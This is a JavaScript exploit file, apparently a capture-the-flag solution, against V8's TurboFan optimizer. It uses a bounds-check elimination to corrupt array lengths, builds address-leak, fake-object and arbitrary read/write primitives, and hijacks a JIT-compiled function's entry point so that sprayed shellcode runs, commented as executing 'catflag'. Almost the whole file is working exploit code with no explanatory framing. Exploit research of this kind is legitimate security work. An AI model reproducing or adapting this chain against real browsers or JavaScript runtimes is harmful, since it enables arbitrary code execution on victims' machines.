135 lines
4.6 KiB
JavaScript
135 lines
4.6 KiB
JavaScript
let ab = new ArrayBuffer(8);
|
|
let f64a = new Float64Array(ab, 0, 1);
|
|
let i32a = new Uint32Array(ab, 0, 2);
|
|
let si32a = new Int32Array(ab, 0, 2);
|
|
let bi64a = new BigUint64Array(ab, 0, 1);
|
|
|
|
function c2f(low, high) { // combined (two 4 bytes) word to float
|
|
i32a[0] = low;
|
|
i32a[1] = high;
|
|
return f64a[0];
|
|
}
|
|
|
|
function b2f(v) { // bigint to float
|
|
bi64a[0] = v;
|
|
return f64a[0];
|
|
}
|
|
|
|
function f2b(v) { // float to bigint
|
|
f64a[0] = v;
|
|
return bi64a[0];
|
|
}
|
|
|
|
function unptr(v) {
|
|
return v & 0xfffffffe;
|
|
}
|
|
|
|
function ptr(v) {
|
|
return v | 1;
|
|
}
|
|
|
|
function shellcode() {
|
|
// JIT spray machine code form of `execve("catflag", NULL, NULL)`
|
|
return [1.9995716422075807e-246, 1.9710255944286777e-246, 1.97118242283721e-246, 1.971136949489835e-246, 1.9711826272869888e-246, 1.9711829003383248e-246, -9.254983612527998e+61];
|
|
}
|
|
for (let i = 0; i < 1000; i++) shellcode(); // Trigger MAGLEV compilation, too large loop count will trigger TURBOFAN
|
|
|
|
function opt(i) {
|
|
let fixed_size_arr = [1.1]; // Range for `fixed_size_arr.length`: [1, 1]
|
|
let corrupt_arr = [2.30234590962020889586281057477E-320];
|
|
let double_arr = [1.09366371363418335018925267989E-319];
|
|
let obj_arr = [corrupt_arr];
|
|
i = i & 0x0fff_ffff; // Range for `i`: [0, 0x0fff_ffff]
|
|
f64a[0] = fixed_size_arr[i]; // `CheckBounds` Eliminated
|
|
i32a[1] = 0x20_0000;
|
|
fixed_size_arr[i] = f64a[0]; // `CheckBounds` Eliminated
|
|
return [fixed_size_arr, corrupt_arr, double_arr, obj_arr];
|
|
}
|
|
|
|
for (let i = 0; i < 1000000; i++)
|
|
opt(0); // Trigger TURBOFAN compilation
|
|
|
|
// %DebugPrint(opt);
|
|
|
|
let [_, corrupt_arr, double_arr, obj_arr] = opt(6);
|
|
|
|
if (corrupt_arr.length !== 0x10_0000) {
|
|
throw new Error("corrupt_arr.length corrupt failed!");
|
|
}
|
|
|
|
// %DebugPrint(corrupt_arr);
|
|
// %DebugPrint(double_arr);
|
|
// %DebugPrint(obj_arr);
|
|
// %SystemBreak();
|
|
|
|
const corrupt_arr_0_to_obj_arr_0_offset = 8;
|
|
const corrupt_arr_0_to_obj_arr_0_offset_IS_HIGH_HALF_QWORD = 0;
|
|
|
|
function GetAddressOf(obj) {
|
|
obj_arr[0] = obj;
|
|
f64a[0] = corrupt_arr[corrupt_arr_0_to_obj_arr_0_offset];
|
|
return unptr(i32a[corrupt_arr_0_to_obj_arr_0_offset_IS_HIGH_HALF_QWORD]);
|
|
}
|
|
|
|
function GetFakeObject(addr) {
|
|
f64a[0] = corrupt_arr[corrupt_arr_0_to_obj_arr_0_offset];
|
|
let old_obj_addr = i32a[corrupt_arr_0_to_obj_arr_0_offset_IS_HIGH_HALF_QWORD];
|
|
i32a[corrupt_arr_0_to_obj_arr_0_offset_IS_HIGH_HALF_QWORD] = ptr(addr);
|
|
corrupt_arr[corrupt_arr_0_to_obj_arr_0_offset] = f64a[0];
|
|
let faked_obj = obj_arr[0];
|
|
i32a[corrupt_arr_0_to_obj_arr_0_offset_IS_HIGH_HALF_QWORD] = old_obj_addr;
|
|
corrupt_arr[corrupt_arr_0_to_obj_arr_0_offset] = f64a[0];
|
|
return faked_obj;
|
|
}
|
|
|
|
const corrupt_arr_0_to_double_arr_element_offset = 6;
|
|
|
|
// QWORD Aligned
|
|
function ArbRead64(cage_addr) { // int32
|
|
if (cage_addr & 0x7) throw new Error("Must QWORD Aligned");
|
|
corrupt_arr[corrupt_arr_0_to_double_arr_element_offset] = c2f(ptr(cage_addr - 0x8), 0x00000002);
|
|
let result = f2b(double_arr[0]);
|
|
console.log(`ArbRead64 ${cage_addr.toString(16)}: ${result.toString(16)}`);
|
|
return result;
|
|
}
|
|
|
|
// QWORD Aligned
|
|
function ArbWrite64(cage_addr, value) { // int32, bigint
|
|
if (cage_addr & 0x7) throw new Error("Must QWORD Aligned");
|
|
corrupt_arr[corrupt_arr_0_to_double_arr_element_offset] = c2f(ptr(cage_addr - 0x8), 0x00000002);
|
|
let written = b2f(value);
|
|
double_arr[0] = written;
|
|
console.log(`ArbWrite64 ${cage_addr.toString(16)}: ${value.toString(16)}`);
|
|
}
|
|
|
|
// DWORD Aligned
|
|
function ArbRead32(cage_addr) { // int32 -> int32
|
|
if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
|
|
bi64a[0] = ArbRead64(cage_addr & 0xfffffff8);
|
|
let result = i32a[(cage_addr & 0x4) >> 2];
|
|
console.log(`ArbRead32 ${cage_addr.toString(16)}: ${result.toString(16)}`);
|
|
return result;
|
|
}
|
|
|
|
// DWORD Aligned
|
|
function ArbWrite32(cage_addr, value) { // int32, int32 -> void
|
|
if (cage_addr & 0x3) throw new Error("Must DWORD Aligned");
|
|
let QWORD_Aligned_cage_addr = cage_addr & 0xfffffff8;
|
|
bi64a[0] = ArbRead64(QWORD_Aligned_cage_addr);
|
|
i32a[(cage_addr & 0x4) >> 2] = value;
|
|
ArbWrite64(QWORD_Aligned_cage_addr, bi64a[0]);
|
|
console.log(`ArbWrite32 ${cage_addr.toString(16)}: ${value.toString(16)}`);
|
|
}
|
|
|
|
let shellcode_addr = GetAddressOf(shellcode);
|
|
console.log("Address of shellcode: " + shellcode_addr.toString(16));
|
|
// %DebugPrint(shellcode);
|
|
// %SystemBreak();
|
|
let code_addr = unptr(ArbRead32(shellcode_addr + 0xC));
|
|
console.log("Address of code: " + code_addr.toString(16));
|
|
let instruction_start_addr = code_addr + 0x14;
|
|
let instruction_start = ArbRead32(instruction_start_addr);
|
|
console.log("instruction_start: " + instruction_start.toString(16));
|
|
ArbWrite32(instruction_start_addr, instruction_start + 0x6B);
|
|
|
|
shellcode(); |